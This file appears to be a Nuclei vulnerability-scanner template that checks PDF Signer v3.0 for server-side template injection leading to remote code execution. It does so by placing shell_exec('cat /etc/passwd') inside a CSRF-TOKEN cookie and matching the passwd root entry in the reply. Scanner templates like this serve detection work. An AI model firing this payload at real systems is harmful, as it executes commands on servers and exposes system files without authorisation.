nuclei-templates/vulnerabilities/pdf-signer-ssti-to-rce.yaml

23 lines
482 B
YAML

id: pdf-signer-ssti-to-rce
info:
name: PDF Signer v3.0 - SSTI to RCE via CSRF Cookie
author: madrobot
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/"
headers:
Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body